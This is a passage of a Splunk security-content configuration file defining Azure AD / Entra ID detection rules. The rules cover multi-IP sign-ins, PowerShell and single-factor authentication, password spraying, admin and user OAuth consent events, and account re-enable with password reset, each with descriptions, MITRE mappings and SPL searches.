action.escu.known_false_positives = A user with successful authentication events from different IPs may also represent the legitimate use of more than one device. Filter as needed and/or customize the threshold to fit your environment.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Successful Authentication From Different Ips - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Compromised User Account", "Azure Active Directory Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $user$ has had successful authentication events from more than one unique IP address in the span of 30 minutes.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Successful Authentication From Different Ips - Rule
action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account", "Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.001", "T1110.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies an Azure AD account successfully authenticating from more than one unique IP address in the span of 30 minutes. This behavior could represent an adversary who has stolen credentials via a phishing attack or some other method and is using them to access corporate online resources around the same time as a legitimate user. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments.
action.notable.param.rule_title = Azure AD Successful Authentication From Different Ips
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` properties.authenticationDetails{}.succeeded=true category=SignInLogs | rename properties.* as * | bucket span=30m _time | stats count min(_time) as firstTime max(_time) as lastTime dc(src_ip) AS unique_ips values(src_ip) as src_ip values(appDisplayName) as appDisplayName by user, _time | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where unique_ips > 1 | `azure_ad_successful_authentication_from_different_ips_filter`

[ESCU - Azure AD Successful PowerShell Authentication - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a successful authentication event against an Azure AD tenant using PowerShell commandlets. This behavior is not common for regular, non-administrative users. After compromising an account in Azure AD, attackers and red teams alike will perform enumeration and discovery techniques. One method of executing these techniques is leveraging the native PowerShell modules.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies a successful authentication event against an Azure AD tenant using PowerShell commandlets. This behavior is not common for regular, non-administrative users. After compromising an account in Azure AD, attackers and red teams alike will perform enumeration and discovery techniques. One method of executing these techniques is leveraging the native PowerShell modules.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Signin log category.
action.escu.known_false_positives = Administrative users will likely use PowerShell commandlets to troubleshoot and maintain the environment. Filter as needed.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Successful PowerShell Authentication - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Account Takeover"]
action.risk = 1
action.risk.param._risk_message = Successful authentication for user $user$ using PowerShell.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Successful PowerShell Authentication - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies a successful authentication event against an Azure AD tenant using PowerShell commandlets. This behavior is not common for regular, non-administrative users. After compromising an account in Azure AD, attackers and red teams alike will perform enumeration and discovery techniques. One method of executing these techniques is leveraging the native PowerShell modules.
action.notable.param.rule_title = Azure AD Successful PowerShell Authentication
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` category=SignInLogs properties.authenticationDetails{}.succeeded=true properties.appDisplayName="Microsoft Azure PowerShell" | rename properties.* as * | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by src_ip, appDisplayName, user_agent | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_successful_powershell_authentication_filter`

[ESCU - Azure AD Successful Single-Factor Authentication - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a successful authentication event against Azure Active Directory for an account without Multi-Factor Authentication enabled. This could be evidence of a misconfiguration, a policy violation or an account takeover attempt that should be investigated.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004"], "nist": ["DE.CM"]}
action.escu.data_models = ["Authentication"]
action.escu.eli5 = The following analytic identifies a successful authentication event against Azure Active Directory for an account without Multi-Factor Authentication enabled. This could be evidence of a misconfiguration, a policy violation or an account takeover attempt that should be investigated.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Signin log category.
action.escu.known_false_positives = Although not recommended, certain users may be required to authenticate without multi-factor authentication. Filter as needed.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Successful Single-Factor Authentication - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Account Takeover"]
action.risk = 1
action.risk.param._risk_message = Successful authentication for user $user$ without MFA
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Successful Single-Factor Authentication - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies a successful authentication event against Azure Active Directory for an account without Multi-Factor Authentication enabled. This could be evidence of a misconfiguration, a policy violation or an account takeover attempt that should be investigated.
action.notable.param.rule_title = Azure AD Successful Single-Factor Authentication
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` category=SignInLogs properties.authenticationRequirement=singleFactorAuthentication properties.authenticationDetails{}.succeeded=true | rename properties.* as * | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by src_ip, appDisplayName, authenticationRequirement | `azure_ad_successful_single_factor_authentication_filter`

[ESCU - Azure AD Tenant Wide Admin Consent Granted - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies instances where admin consent is granted to an application within an Azure AD tenant. It leverages Azure AD audit logs, specifically events related to the admin consent action within the ApplicationManagement category. The admin consent action allows applications to access data across the entire tenant, potentially encompassing a vast amount of organizational data. Given its broad scope and the sensitivity of some permissions that can only be granted via admin consent, it's crucial to monitor this action. Unauthorized or inadvertent granting of admin consent can lead to significant security risks, including data breaches, unauthorized data access, and potential compliance violations. If an attacker successfully tricks an administrator into granting admin consent to a malicious or compromised application, they can gain extensive and persistent access to organizational data. This can lead to data exfiltration, espionage, further malicious activities within the tenant, and potential breaches of compliance regulations.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies instances where admin consent is granted to an application within an Azure AD tenant. It leverages Azure AD audit logs, specifically events related to the admin consent action within the ApplicationManagement category. The admin consent action allows applications to access data across the entire tenant, potentially encompassing a vast amount of organizational data. Given its broad scope and the sensitivity of some permissions that can only be granted via admin consent, it's crucial to monitor this action. Unauthorized or inadvertent granting of admin consent can lead to significant security risks, including data breaches, unauthorized data access, and potential compliance violations. If an attacker successfully tricks an administrator into granting admin consent to a malicious or compromised application, they can gain extensive and persistent access to organizational data. This can lead to data exfiltration, espionage, further malicious activities within the tenant, and potential breaches of compliance regulations.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Auditlogs log category.
action.escu.known_false_positives = Legitimate applications may be granted tenant wide consent, filter as needed.
action.escu.creation_date = 2023-09-14
action.escu.modification_date = 2023-09-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Tenant Wide Admin Consent Granted - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Persistence", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = Administrator $user$ consented an OAuth application for the tenant.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 45}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Tenant Wide Admin Consent Granted - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies instances where admin consent is granted to an application within an Azure AD tenant. It leverages Azure AD audit logs, specifically events related to the admin consent action within the ApplicationManagement category. The admin consent action allows applications to access data across the entire tenant, potentially encompassing a vast amount of organizational data. Given its broad scope and the sensitivity of some permissions that can only be granted via admin consent, it's crucial to monitor this action. Unauthorized or inadvertent granting of admin consent can lead to significant security risks, including data breaches, unauthorized data access, and potential compliance violations. If an attacker successfully tricks an administrator into granting admin consent to a malicious or compromised application, they can gain extensive and persistent access to organizational data. This can lead to data exfiltration, espionage, further malicious activities within the tenant, and potential breaches of compliance regulations.
action.notable.param.rule_title = Azure AD Tenant Wide Admin Consent Granted
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` operationName="Consent to application" | eval new_field=mvindex('properties.targetResources{}.modifiedProperties{}.newValue', 4) | rename properties.* as * | rex field=new_field "ConsentType: (?<ConsentType>[^\,]+)" | rex field=new_field "Scope: (?<Scope>[^\,]+)" | search ConsentType = "AllPrincipals" | stats count min(_time) as firstTime max(_time) as lastTime by operationName, user, targetResources{}.displayName, targetResources{}.id, ConsentType, Scope | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_tenant_wide_admin_consent_granted_filter`

[ESCU - Azure AD Unusual Number of Failed Authentications From Ip - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies one source IP failing to authenticate with multiple valid users. This behavior could represent an adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password.\
The detection calculates the standard deviation for source IP and leverages the 3-sigma statistical rule to identify an unusual number of failed authentication attempts. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. This logic can be used for real time security monitoring as well as threat hunting exercises.\
While looking for anomalies using statistical methods like the standard deviation can have benefits, we also recommend using threshold-based detections to complement coverage. A similar analytic following the threshold model is `Azure AD Multiple Users Failing To Authenticate From Ip`.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies one source IP failing to authenticate with multiple valid users. This behavior could represent an adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password.\
The detection calculates the standard deviation for source IP and leverages the 3-sigma statistical rule to identify an unusual number of failed authentication attempts. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. This logic can be used for real time security monitoring as well as threat hunting exercises.\
While looking for anomalies using statistical methods like the standard deviation can have benefits, we also recommend using threshold-based detections to complement coverage. A similar analytic following the threshold model is `Azure AD Multiple Users Failing To Authenticate From Ip`.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Signin log category.
action.escu.known_false_positives = A source IP failing to authenticate with multiple users is not common for legitimate behavior.
action.escu.creation_date = 2022-07-11
action.escu.modification_date = 2022-07-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Unusual Number of Failed Authentications From Ip - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Account Takeover"]
action.risk = 1
action.risk.param._risk_message = Possible Password Spraying attack against Azure AD from source IP $ipAddress$
action.risk.param._risk = [{"risk_object_field": "userPrincipalName", "risk_object_type": "user", "risk_score": 54}, {"threat_object_field": "ipAddress", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Unusual Number of Failed Authentications From Ip - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` category=SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as userPrincipalName by _time, ipAddress | eventstats avg(unique_accounts) as ip_avg, stdev(unique_accounts) as ip_std by ipAddress | eval upperBound=(ip_avg+ip_std*3) | eval isOutlier=if(unique_accounts > 10 and unique_accounts >= upperBound, 1,0) | where isOutlier = 1 | `azure_ad_unusual_number_of_failed_authentications_from_ip_filter`

[ESCU - Azure AD User Consent Blocked for Risky Application - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies instances where Azure AD has blocked a user's attempt to grant consent to an application deemed risky or potentially malicious. This suggests that the application has exhibited behaviors or characteristics that are commonly associated with malicious intent or poses a security risk. This detection leverages the Azure AD audit logs, specifically focusing on events related to user consent actions and system-driven blocks. By filtering for blocked consent actions associated with applications, the analytic highlights instances where Azure's built-in security measures have intervened. Applications that are flagged and blocked by Azure typically exhibit suspicious characteristics or behaviors. Monitoring for these blocked consent attempts helps security teams identify potential threats early on and can provide insights into users who might be targeted or susceptible to such risky applications. It's an essential layer of defense in ensuring that malicious or risky applications don't gain access to organizational data. If the detection is a true positive, it indicates that the built-in security measures of O365 successfully prevented a potentially harmful application from gaining access. However, the attempt itself suggests that either a user might be targeted or that there's a presence of malicious applications trying to infiltrate the organization. Immediate investigation is required to understand the context of the block and to take further preventive measures.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]}
action.escu.data_models = ["Risk"]
action.escu.eli5 = The following analytic identifies instances where Azure AD has blocked a user's attempt to grant consent to an application deemed risky or potentially malicious. This suggests that the application has exhibited behaviors or characteristics that are commonly associated with malicious intent or poses a security risk. This detection leverages the Azure AD audit logs, specifically focusing on events related to user consent actions and system-driven blocks. By filtering for blocked consent actions associated with applications, the analytic highlights instances where Azure's built-in security measures have intervened. Applications that are flagged and blocked by Azure typically exhibit suspicious characteristics or behaviors. Monitoring for these blocked consent attempts helps security teams identify potential threats early on and can provide insights into users who might be targeted or susceptible to such risky applications. It's an essential layer of defense in ensuring that malicious or risky applications don't gain access to organizational data. If the detection is a true positive, it indicates that the built-in security measures of O365 successfully prevented a potentially harmful application from gaining access. However, the attempt itself suggests that either a user might be targeted or that there's a presence of malicious applications trying to infiltrate the organization. Immediate investigation is required to understand the context of the block and to take further preventive measures.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category.
action.escu.known_false_positives = UPDATE_KNOWN_FALSE_POSITIVES
action.escu.creation_date = 2023-10-27
action.escu.modification_date = 2023-10-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD User Consent Blocked for Risky Application - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Account Takeover"]
action.risk = 1
action.risk.param._risk_message = Azure AD has blocked $user$ attempt to grant consent to an application deemed risky.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 30}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD User Consent Blocked for Risky Application - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 100, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies instances where Azure AD has blocked a user's attempt to grant consent to an application deemed risky or potentially malicious. This suggests that the application has exhibited behaviors or characteristics that are commonly associated with malicious intent or poses a security risk. This detection leverages the Azure AD audit logs, specifically focusing on events related to user consent actions and system-driven blocks. By filtering for blocked consent actions associated with applications, the analytic highlights instances where Azure's built-in security measures have intervened. Applications that are flagged and blocked by Azure typically exhibit suspicious characteristics or behaviors. Monitoring for these blocked consent attempts helps security teams identify potential threats early on and can provide insights into users who might be targeted or susceptible to such risky applications. It's an essential layer of defense in ensuring that malicious or risky applications don't gain access to organizational data. If the detection is a true positive, it indicates that the built-in security measures of O365 successfully prevented a potentially harmful application from gaining access. However, the attempt itself suggests that either a user might be targeted or that there's a presence of malicious applications trying to infiltrate the organization. Immediate investigation is required to understand the context of the block and to take further preventive measures.
action.notable.param.rule_title = Azure AD User Consent Blocked for Risky Application
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` operationName="Consent to application" properties.result=failure | rename properties.* as * | eval reason_index = if(mvfind('targetResources{}.modifiedProperties{}.displayName', "ConsentAction.Reason") >= 0, mvfind('targetResources{}.modifiedProperties{}.displayName', "ConsentAction.Reason"), -1) | eval permissions_index = if(mvfind('targetResources{}.modifiedProperties{}.displayName', "ConsentAction.Permissions") >= 0, mvfind('targetResources{}.modifiedProperties{}.displayName', "ConsentAction.Permissions"), -1) | search reason_index >= 0 | eval reason = mvindex('targetResources{}.modifiedProperties{}.newValue',reason_index) | eval permissions = mvindex('targetResources{}.modifiedProperties{}.newValue',permissions_index) | search reason = "\"Risky application detected\"" | rex field=permissions "Scope: (?<Scope>[^,]+)" | stats count min(_time) as firstTime max(_time) as lastTime by operationName, user, reason, Scope | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_user_consent_blocked_for_risky_application_filter`

[ESCU - Azure AD User Consent Denied for OAuth Application - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies instances where a user has actively denied consent to an OAuth application seeking permissions within the Azure AD environment. This suggests that the user either recognized something suspicious about the application or chose not to grant it the requested permissions for other reasons. This detection leverages Azure AD's audit logs, specifically focusing on events related to user consent actions. By filtering for denied consent actions associated with OAuth applications, the analytic captures instances where users have actively rejected permission requests. While user-denied consents can be routine, they can also be indicative of users spotting potentially suspicious or unfamiliar applications. By monitoring these denied consent attempts, security teams can gain insights into applications that might be perceived as risky or untrusted by users. It can also serve as a feedback loop for security awareness training, indicating that users are being cautious about granting permissions. If the detection is a true positive, it indicates that a user has actively prevented an OAuth application from gaining the permissions it requested. While this is a proactive security measure on the user's part, it's essential for security teams to review the context of the denial. Understanding why certain applications are being denied can help in refining application whitelisting policies and ensuring that no malicious applications are attempting to gain access.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies instances where a user has actively denied consent to an OAuth application seeking permissions within the Azure AD environment. This suggests that the user either recognized something suspicious about the application or chose not to grant it the requested permissions for other reasons. This detection leverages Azure AD's audit logs, specifically focusing on events related to user consent actions. By filtering for denied consent actions associated with OAuth applications, the analytic captures instances where users have actively rejected permission requests. While user-denied consents can be routine, they can also be indicative of users spotting potentially suspicious or unfamiliar applications. By monitoring these denied consent attempts, security teams can gain insights into applications that might be perceived as risky or untrusted by users. It can also serve as a feedback loop for security awareness training, indicating that users are being cautious about granting permissions. If the detection is a true positive, it indicates that a user has actively prevented an OAuth application from gaining the permissions it requested. While this is a proactive security measure on the user's part, it's essential for security teams to review the context of the denial. Understanding why certain applications are being denied can help in refining application whitelisting policies and ensuring that no malicious applications are attempting to gain access.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category.
action.escu.known_false_positives = Users may deny consent for legitimate applications by mistake, filter as needed.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD User Consent Denied for OAuth Application - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $user$ denied consent for an OAuth application.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD User Consent Denied for OAuth Application - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies instances where a user has actively denied consent to an OAuth application seeking permissions within the Azure AD environment. This suggests that the user either recognized something suspicious about the application or chose not to grant it the requested permissions for other reasons. This detection leverages Azure AD's audit logs, specifically focusing on events related to user consent actions. By filtering for denied consent actions associated with OAuth applications, the analytic captures instances where users have actively rejected permission requests. While user-denied consents can be routine, they can also be indicative of users spotting potentially suspicious or unfamiliar applications. By monitoring these denied consent attempts, security teams can gain insights into applications that might be perceived as risky or untrusted by users. It can also serve as a feedback loop for security awareness training, indicating that users are being cautious about granting permissions. If the detection is a true positive, it indicates that a user has actively prevented an OAuth application from gaining the permissions it requested. While this is a proactive security measure on the user's part, it's essential for security teams to review the context of the denial. Understanding why certain applications are being denied can help in refining application whitelisting policies and ensuring that no malicious applications are attempting to gain access.
action.notable.param.rule_title = Azure AD User Consent Denied for OAuth Application
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` operationName="Sign-in activity" properties.status.errorCode=65004 | rename properties.* as * | stats count min(_time) as firstTime max(_time) as lastTime by operationName, user, appDisplayName, status.failureReason | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_user_consent_denied_for_oauth_application_filter`

[ESCU - Azure AD User Enabled And Password Reset - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies an Azure AD user enabling a previously disabled account and resetting its password within 2 minutes. This behavior could represent an adversary who has obtained administrative access and is trying to establish a backdoor identity within an Azure AD tenant.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies an Azure AD user enabling a previously disabled account and resetting its password within 2 minutes. This behavior could represent an adversary who has obtained administrative access and is trying to establish a backdoor identity within an Azure AD tenant.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category.
action.escu.known_false_positives = While not common, Administrators may enable accounts and reset their passwords for legitimate reasons. Filter as needed.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD User Enabled And Password Reset - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Persistence"]
action.risk = 1
action.risk.param._risk_message = A user account, $user$, was enabled and its password reset within 2 minutes by $initiatedBy$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 45}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD User Enabled And Password Reset - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies an Azure AD user enabling a previously disabled account and resetting its password within 2 minutes. This behavior could represent an adversary who has obtained administrative access and is trying to establish a backdoor identity within an Azure AD tenant.
